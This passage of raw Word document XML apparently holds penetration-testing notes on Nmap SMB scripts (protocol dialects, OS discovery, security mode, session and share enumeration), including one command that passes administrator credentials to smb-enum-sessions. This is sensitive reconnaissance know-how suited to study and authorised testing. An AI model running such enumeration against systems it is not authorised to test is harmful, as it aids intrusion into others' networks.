      <w:tr w:rsidR="0051746D" w:rsidTr="00F877C1">
        <w:trPr>
          <w:trHeight w:val="1169"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D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A3ED71D" wp14:editId="37CF6AF9">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>37694</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>15190</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1117600" cy="311150"/>
                      <wp:effectExtent l="0" t="0" r="25400" b="127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311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smb-protocols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3ED71D" id="Rounded Rectangle 4" o:spid="_x0000_s1030" style="position:absolute;margin-left:2.95pt;margin-top:1.2pt;width:88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P7bgIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0jTFdgqUlSBmCYh&#10;QMDEs+vYbTTb553dJt1fv7OTBsSQNk17cXy5399957Pzzhq2UxgacBUvjyacKSehbty64t8erz58&#10;4ixE4WphwKmK71Xg54v3785aP1dT2ICpFTIK4sK89RXfxOjnRRHkRlkRjsArR0oNaEUkEddFjaKl&#10;6NYU08nkpGgBa48gVQj097JX8kWOr7WS8VbroCIzFafaYj4xn6t0FoszMV+j8JtGDmWIf6jCisZR&#10;0jHUpYiCbbH5LZRtJEIAHY8k2AK0bqTKPVA35eRVNw8b4VXuhcAJfoQp/L+w8mZ3h6ypKz7jzAlL&#10;I7qHratVze4JPOHWRrFZgqn1YU7WD/4OBynQNfXcabTpS92wLkO7H6FVXWSSfpZleXoyoQlI0n0k&#10;6ThjXzx7ewzxiwLL0qXimKpIJWRYxe46REpL9gc7ElJJfRH5FvdGpTqMu1eaekpps3dmk7owyHaC&#10;eCCkVC4ep6YoXrZObroxZnSc/tlxsE+uKjNtdP6LrKNHzgwujs62cYBvZa+/l0PJurc/IND3nSCI&#10;3aobhjnMaAX1ngaM0DM/eHnVEL7XIsQ7gUR1Ggmtb7ylQxtoKw7DjbMN4M+3/id7YiBpOWtpdSoe&#10;fmwFKs7MV0fc/FzOZmnXsjA7Pp2SgC81q5cat7UXQFMp6aHwMl+TfTSHq0awT7Tly5SVVMJJyl1x&#10;GfEgXMR+pemdkGq5zGa0X17Ea/fg5YEHiTqP3ZNAP5AsEj1v4LBmYv6KZr1tmpCD5TaCbjIHE9I9&#10;rsMEaDczlYZ3JC3/SzlbPb92i18AAAD//wMAUEsDBBQABgAIAAAAIQCsRkKj1wAAAAYBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI7NToNAFIX3Jr7D5Jq4swMEtSJDY40uXNr6ALfMLZAydwgzQPXpvV3p&#10;8vzknK/cnF2vZhpD59lAukpAEdfedtwY+Nq/361BhYhssfdMBr4pwKa6viqxsH7hT5p3sVEywqFA&#10;A22MQ6F1qFtyGFZ+IJbs6EeHUeTYaDviIuOu11mSPGiHHctDiwO9tlSfdpMz8Ga3R/tx4ulx68Lw&#10;s+QZJnNmzO3N+eUZVKRz/CvDBV/QoRKmg5/YBtUbuH+SooEsB3VJ16nog9hpDroq9X/86hcAAP//&#10;AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABf&#10;cmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCFdqP7bgIAADUFAAAOAAAAAAAAAAAAAAAAAC4CAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCsRkKj1wAAAAYBAAAPAAAAAAAAAAAAAAAAAMgE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAzAU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smb-protocols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Default="0051746D" w:rsidP="005F0D9E"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D">
            <w:r>
              <w:t>- Shows SMB Protocol dialects</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="005F0D9E">
            <w:r>
              <w:t>- Issue: SMB v1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F877C1" w:rsidRDefault="00F877C1" w:rsidP="005F0D9E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D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D7E461E" wp14:editId="6054B2BB">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>33401</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>11176</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1276350" cy="349250"/>
                      <wp:effectExtent l="0" t="0" r="19050" b="1270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349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SMB-os-discovery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E461E" id="Rounded Rectangle 5" o:spid="_x0000_s1031" style="position:absolute;margin-left:2.65pt;margin-top:.9pt;width:100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e7bgIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0hbWhgVKapATJMQ&#10;IGDi2XXsNprt885uk+6v39lJA2JIm6a9OOfc7+++8/lFaw3bKQw1uJKPj0acKSehqt265N+erj99&#10;5ixE4SphwKmS71XgF4uPH84bP1cT2ICpFDIK4sK88SXfxOjnRRHkRlkRjsArR0oNaEWkK66LCkVD&#10;0a0pJqPRSdEAVh5BqhDo71Wn5IscX2sl453WQUVmSk61xXxiPlfpLBbnYr5G4Te17MsQ/1CFFbWj&#10;pEOoKxEF22L9WyhbS4QAOh5JsAVoXUuVe6BuxqM33TxuhFe5FwIn+AGm8P/CytvdPbK6KvmMMycs&#10;jegBtq5SFXsg8IRbG8VmCabGhzlZP/p77G+BxNRzq9GmL3XD2gztfoBWtZFJ+jmenJ4cz2gCknTH&#10;07MJyRSmePH2GOIXBZYloeSYqkglZFjF7ibEzv5gR86ppK6ILMW9UakO4x6Upp5S2uyd2aQuDbKd&#10;IB4IKZWLuSnKn62Tm66NGRwnf3bs7ZOrykwbnP8i6+CRM4OLg7OtHeB72avv4x4y3dkfEOj6ThDE&#10;dtX2w+xntIJqTwNG6JgfvLyuCd8bEeK9QKI6jYTWN97RoQ00JYde4mwD+PO9/8meGEhazhpanZKH&#10;H1uBijPz1RE3z8bTadq1fJnOTid0wdea1WuN29pLoKmM6aHwMovJPpqDqBHsM235MmUllXCScpdc&#10;RjxcLmO30vROSLVcZjPaLy/ijXv08sCDRJ2n9lmg70kWiZ63cFgzMX9Ds842TcjBchtB15mDCekO&#10;134CtJuZyv07kpb/9T1bvbx2i18AAAD//wMAUEsDBBQABgAIAAAAIQCNhZua1wAAAAYBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI7LTsMwEEX3SPyDNUjsqNMAoUrjVBTBgiUtHzCNp0nUeBzFzgO+nmEF&#10;y/vQvafYLa5TEw2h9WxgvUpAEVfetlwb+Dy+3W1AhYhssfNMBr4owK68viowt37mD5oOsVYywiFH&#10;A02Mfa51qBpyGFa+J5bs7AeHUeRQazvgLOOu02mSZNphy/LQYE8vDVWXw+gMvNr92b5feHzau9B/&#10;zw8pJlNqzO3N8rwFFWmJf2X4xRd0KIXp5Ee2QXUGHu+lKLbwS5ommeiT2NkGdFno//jlDwAAAP//&#10;AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABf&#10;cmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBUNZe7bgIAADUFAAAOAAAAAAAAAAAAAAAAAC4CAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCNhZua1wAAAAYBAAAPAAAAAAAAAAAAAAAAAMgE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAzAU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SMB-os-discovery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Default="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRPr="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>-To determine the operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0051746D" w:rsidTr="00F877C1">
        <w:trPr>
          <w:trHeight w:val="890"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D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4174C54" wp14:editId="3CD828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-3175</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1392072" cy="307075"/>
                      <wp:effectExtent l="0" t="0" r="17780" b="1714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072" cy="307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smb-security-mode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174C54" id="Rounded Rectangle 6" o:spid="_x0000_s1032" style="position:absolute;margin-left:-.5pt;margin-top:-.25pt;width:109.6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QNbgIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Tem107Fzcm62ASUgoh&#10;MUlKnmWtZC/VatSR7F336zvSXhLSQEvpi1azcz9zRheXbW3YXqGvwBZ8cpRzpqyEsrKbgn97uvn0&#10;mTMfhC2FAasKflCeXy4+frho3FxNYQumVMgoiPXzxhV8G4KbZ5mXW1ULfwROWVJqwFoEEnGTlSga&#10;il6bbJrnZ1kDWDoEqbynv9edki9SfK2VDPdaexWYKTjVFtKJ6VzHM1tciPkGhdtWsi9D/EMVtags&#10;JR1DXYsg2A6r30LVlUTwoMORhDoDrSupUg/UzSR/083jVjiVeiFwvBth8v8vrLzbr5BVZcHPOLOi&#10;phE9wM6WqmQPBJ6wG6PYWYSpcX5O1o9uhb3k6Rp7bjXW8UvdsDZBexihVW1gkn5Ojs+n+WzKmSTd&#10;cT7LZ6cxaPbi7dCHLwpqFi8Fx1hFLCHBKva3PnT2gx05x5K6ItItHIyKdRj7oDT1FNMm78QmdWWQ&#10;7QXxQEipbBjyJ+vopitjRsfpnx17++iqEtNG57/IOnqkzGDD6FxXFvC97OX3SQ+Z7uwHBLq+IwSh&#10;Xbf9MPsZraE80IAROuZ7J28qwvdW+LASSFSnpaD1Dfd0aANNwaG/cbYF/Pne/2hPDCQtZw2tTsH9&#10;j51AxZn5aomb55OTk7hrSTg5nU1JwNea9WuN3dVXQFOZ0EPhZLpG+2CGq0aon2nLlzErqYSVlLvg&#10;MuAgXIVupemdkGq5TGa0X06EW/vo5MCDSJ2n9lmg60kWiJ53MKyZmL+hWWcbJ2RhuQugq8TBiHSH&#10;az8B2s1E5f4dicv/Wk5WL6/d4hcAAAD//wMAUEsDBBQABgAIAAAAIQCvGZ5T2wAAAAcBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjcWidRoSXEqSiCA0cKD7CNt0nUeB3Fzg88PcsJ&#10;TqvRjGa+LfaL69REQ2g9G0jXCSjiytuWawOfH6+rHagQkS12nsnAFwXYl9dXBebWz/xO0zHWSko4&#10;5GigibHPtQ5VQw7D2vfE4p394DCKHGptB5yl3HU6S5J77bBlWWiwp+eGqstxdAZe7OFs3y48bg8u&#10;9N/zJsNkyoy5vVmeHkFFWuJfGH7xBR1KYTr5kW1QnYFVKq9EuXegxM7SXQbqZGCzfQBdFvo/f/kD&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEApQZUDW4CAAA1BQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEArxmeU9sAAAAHAQAADwAAAAAAAAAAAAAA&#10;AADIBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANAF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smb-security-mode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Default="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:r>
              <w:t>- T</w:t>
            </w:r>
            <w:r>
              <w:t>o determine the security mode</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> of SMB service</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>NONE: No security mode.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>SHARE: Share-level security mode.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>USER: User-level security mode.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>DOMAIN: Domain-level security mode.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="0051746D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>ADS: Active Directory security mode.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D">
            <w:r w:rsidRPr="005F0D9E">
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="002D3673">
              <w:t xml:space="preserve">ssue: </w:t>
            </w:r>
            <w:r w:rsidR="00B90091">
              <w:t>Messe</w:t>
            </w:r>
            <w:r w:rsidR="00B90091" w:rsidRPr="005F0D9E">
              <w:t>ge_signing</w:t>
            </w:r>
            <w:r w:rsidRPr="005F0D9E">
              <w:t>: disabled</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F877C1" w:rsidRPr="0051746D" w:rsidRDefault="00F877C1" w:rsidP="0051746D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D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86FC3E8" wp14:editId="12BB6B3C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2565</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-2515</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1439839" cy="320722"/>
                      <wp:effectExtent l="0" t="0" r="27305" b="2222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839" cy="3207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smb-enum-sessions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FC3E8" id="Rounded Rectangle 7" o:spid="_x0000_s1033" style="position:absolute;margin-left:.2pt;margin-top:-.2pt;width:113.35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AobwIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0iblhWqpqgCMU1C&#10;gICJZ9ex22iOzzu7Tbq/fmcnDYghbZr24vhyv7/7zouLtjZsr9BXYAs+PhlxpqyEsrKbgn97uv50&#10;xpkPwpbCgFUFPyjPL5YfPywaN1c5bMGUChkFsX7euIJvQ3DzLPNyq2rhT8ApS0oNWItAIm6yEkVD&#10;0WuT5aPR56wBLB2CVN7T36tOyZcpvtZKhjutvQrMFJxqC+nEdK7jmS0XYr5B4baV7MsQ/1BFLSpL&#10;SYdQVyIItsPqt1B1JRE86HAioc5A60qq1AN1Mx696eZxK5xKvRA43g0w+f8XVt7u75FVZcFnnFlR&#10;04geYGdLVbIHAk/YjVFsFmFqnJ+T9aO7x17ydI09txrr+KVuWJugPQzQqjYwST/H08n52eScM0m6&#10;ST6a5XkMmr14O/Thi4KaxUvBMVYRS0iwiv2ND5390Y6cY0ldEekWDkbFOox9UJp6immTd2KTujTI&#10;9oJ4IKRUNpz2+ZN1dNOVMYNj/mfH3j66qsS0wfkvsg4eKTPYMDjXlQV8L3v5fdyXrDv7IwJd3xGC&#10;0K7bfpj9jNZQHmjACB3zvZPXFeF7I3y4F0hUp6Wg9Q13dGgDTcGhv3G2Bfz53v9oTwwkLWcNrU7B&#10;/Y+dQMWZ+WqJm+fj6TTuWhKmp7OcBHytWb/W2F19CTSVMT0UTqZrtA/meNUI9TNt+SpmJZWwknIX&#10;XAY8CpehW2l6J6RarZIZ7ZcT4cY+OnnkQaTOU/ss0PUkC0TPWziumZi/oVlnGydkYbULoKvEwYh0&#10;h2s/AdrNROX+HYnL/1pOVi+v3fIXAAAA//8DAFBLAwQUAAYACAAAACEAmnynHtkAAAAFAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyOzU7DMBCE70h9B2srcWvtWIWikE1FERw4UngAN3aTqPE6ip0feHqW&#10;E5xGoxnNfMVh8Z2Y3BDbQAjZVoFwVAXbUo3w+fG6eQARkyFrukAO4ctFOJSrm8LkNsz07qZTqgWP&#10;UMwNQpNSn0sZq8Z5E7ehd8TZJQzeJLZDLe1gZh73ndRK3UtvWuKHxvTuuXHV9TR6hBd7vNi3K437&#10;o4/997zTRk0a8Xa9PD2CSG5Jf2X4xWd0KJnpHEayUXQIO+4hbFg41HqfgTgj3KkMZFnI//TlDwAA&#10;AP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8B&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAuEJAobwIAADUFAAAOAAAAAAAAAAAAAAAAAC4C&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCafKce2QAAAAUBAAAPAAAAAAAAAAAAAAAA&#10;AMkEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAzwU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smb-enum-sessions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Default="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRPr="0051746D" w:rsidRDefault="00F877C1" w:rsidP="009F6E91">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="0051746D" w:rsidRPr="005F0D9E">
              <w:t>Shows Active sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0051746D" w:rsidTr="00F877C1">
        <w:trPr>
          <w:trHeight w:val="1430"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002D3673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7E7CD1E" wp14:editId="52B4C44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4141</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1255594" cy="314554"/>
                      <wp:effectExtent l="0" t="0" r="2095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594" cy="3145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51746D">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r w:rsidRPr="005F0D9E">
                                    <w:t>smb-enum-shares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E7CD1E" id="Rounded Rectangle 9" o:spid="_x0000_s1034" style="position:absolute;margin-left:-.45pt;margin-top:.35pt;width:98.8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sGbgIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0jTNRutSFEFYpqE&#10;AAETz65jt9Ecn3d2m3R//c5OGhBD2jTtJfH5vvv9nc/Ou8awvUJfgy15fjLhTFkJVW03Jf/2ePXh&#10;lDMfhK2EAatKflCeny/fvztr3UJNYQumUsjIifWL1pV8G4JbZJmXW9UIfwJOWVJqwEYEEnGTVSha&#10;8t6YbDqZfMpawMohSOU93V72Sr5M/rVWMtxq7VVgpuSUW0hfTN91/GbLM7HYoHDbWg5piH/IohG1&#10;paCjq0sRBNth/ZurppYIHnQ4kdBkoHUtVaqBqsknr6p52AqnUi3UHO/GNvn/51be7O+Q1VXJ55xZ&#10;0dCI7mFnK1Wxe2qesBuj2Dy2qXV+QegHd4eD5OkYa+40NvFP1bAutfYwtlZ1gUm6zKdFUcxnnEnS&#10;fcxnRTGLTrNna4c+fFHQsHgoOcYsYgqprWJ/7UOPP+LIOKbUJ5FO4WBUzMPYe6Wpphg2WSc2qQuD&#10;bC+IB0JKZUMxxE/oaKZrY0bD6Z8NB3w0VYlpo/FfRB0tUmSwYTRuagv4VvTqez6krHv8sQN93bEF&#10;oVt3aZinERlv1lAdaMAIPfO9k1c19fda+HAnkKhOS0HrG27pow20JYfhxNkW8Odb9xFPDCQtZy2t&#10;Tsn9j51AxZn5aomb83w2i7uWhFnxeUoCvtSsX2rsrrkAmkpOD4WT6RjxwRyPGqF5oi1fxaikElZS&#10;7JLLgEfhIvQrTe+EVKtVgtF+ORGu7YOTRx5E6jx2TwLdQLJA9LyB45qJxSua9dg4IQurXQBdJw4+&#10;93WYAO1movLwjsTlfykn1PNrt/wFAAD//wMAUEsDBBQABgAIAAAAIQDlaZ6O2QAAAAUBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtZW4tU4jaGnIpqIIDhwpPMA23iZR43UUOz/w9Lgn&#10;OI5mNPNNvp9tq0bufeMEYb1KQLGUzjRSIXx9vi0fQflAYqh1wgjf7GFf3N7klBk3yQePx1CpWCI+&#10;I4Q6hC7T2pc1W/Ir17FE7+x6SyHKvtKmpymW21anSbLRlhqJCzV1/FJzeTkOFuHVHM7m/SLD9mB9&#10;9zPdp5SMKeLdYn5+AhV4Dn9huOJHdCgi08kNYrxqEZa7GETYgrqau038cUJ4SFLQRa7/0xe/AAAA&#10;//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABJcmwZuAgAANQUAAA4AAAAAAAAAAAAAAAAALgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAOVpno7ZAAAABQEAAA8AAAAAAAAAAAAAAAAA&#10;yAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADOBQ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51746D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="005F0D9E">
                              <w:t>smb-enum-shares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D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673"/>
          <w:p w:rsidR="00A13BA3" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidRPr="002D3673">
              <w:t xml:space="preserve">enumerate the available shares on a target </w:t>
            </w:r>
            <w:r w:rsidR="00F877C1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0051746D" w:rsidRDefault="00A13BA3" w:rsidP="002D3673">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="002D3673" w:rsidRPr="002D3673">
              <w:t>system</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F877C1" w:rsidRPr="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673">
            <w:r w:rsidRPr="005F0D9E">
              <w:t>- Shows permissions to the shared accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="005F0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6420FA7" wp14:editId="5F5F71A0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>33198</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2870</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2740279" cy="730155"/>
                      <wp:effectExtent l="0" t="0" r="22225" b="1333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0279" cy="7301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smb-enum-sessions --script-args smbusername=administrator,smbpassword=password IP_address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420FA7" id="Rounded Rectangle 8" o:spid="_x0000_s1035" style="position:absolute;margin-left:2.6pt;margin-top:.25pt;width:215.75pt;height:5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ZubwIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Tem/W6Tp2YrINJSCmE&#10;JORCnmWtZC/VatSR7F336zvSXhLSQEvpi1azcz9zRmfnbW3YXqGvwBY8P5pwpqyEsrKbgj89Xn06&#10;4cwHYUthwKqCH5Tn58uPH84at1BT2IIpFTIKYv2icQXfhuAWWeblVtXCH4FTlpQasBaBRNxkJYqG&#10;otcmm04mX7IGsHQIUnlPfy87JV+m+ForGW619iowU3CqLaQT07mOZ7Y8E4sNCretZF+G+IcqalFZ&#10;SjqGuhRBsB1Wv4WqK4ngQYcjCXUGWldSpR6om3zyppuHrXAq9ULgeDfC5P9fWHmzv0NWlQWnQVlR&#10;04juYWdLVbJ7Ak/YjVHsJMLUOL8g6wd3h73k6Rp7bjXW8UvdsDZBexihVW1gkn5O57PJdH7KmSTd&#10;/PMkPz6OQbMXb4c+fFVQs3gpOMYqYgkJVrG/9qGzH+zIOZbUFZFu4WBUrMPYe6WpJ0qbJ+/EJnVh&#10;kO0F8UBIqWwY8ifr6KYrY0bH6Z8de/voqhLTRue/yDp6pMxgw+hcVxbwvezl97yHTHf2AwJd3xGC&#10;0K7bNMzTYWJrKA80YISO+d7Jq4rwvRY+3AkkqtNS0PqGWzq0gabg0N842wL+fO9/tCcGkpazhlan&#10;4P7HTqDizHyzxM3TfDaLu5aE2fF8SgK+1qxfa+yuvgCaSk4PhZPpGu2DGa4aoX6mLV/FrKQSVlLu&#10;gsuAg3ARupWmd0Kq1SqZ0X45Ea7tg5MDDyJ1Httnga4nWSB63sCwZmLxhmadbZyQhdUugK4SByPS&#10;Ha79BGg3E5X7dyQu/2s5Wb28dstfAAAA//8DAFBLAwQUAAYACAAAACEATw7kq9kAAAAGAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyOy07DMBBF90j8gzVI7KjT0LQoxKkoggVLCh8wjadJ1Hgcxc4Dvp5h&#10;BavR1T26c4r94jo10RBazwbWqwQUceVty7WBz4/XuwdQISJb7DyTgS8KsC+vrwrMrZ/5naZjrJWM&#10;cMjRQBNjn2sdqoYchpXviaU7+8FhlDjU2g44y7jrdJokW+2wZfnQYE/PDVWX4+gMvNjD2b5deNwd&#10;XOi/502KyZQac3uzPD2CirTEPxh+9UUdSnE6+ZFtUJ2BLBVQDigpN/fbHaiTUOssA10W+r9++QMA&#10;AP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8B&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBKFGZubwIAADUFAAAOAAAAAAAAAAAAAAAAAC4C&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBPDuSr2QAAAAYBAAAPAAAAAAAAAAAAAAAA&#10;AMkEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAzwU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smb-enum-sessions --script-args smbusername=administrator,smbpassword=password IP_address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Pr="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRPr="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="9360"/>
              </w:tabs>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0051746D" w:rsidTr="00F877C1">
        <w:trPr>
          <w:trHeight w:val="1430"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D" w:rsidRDefault="00B90091" w:rsidP="005F0D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434A026" wp14:editId="31F0A08E">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-20981</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
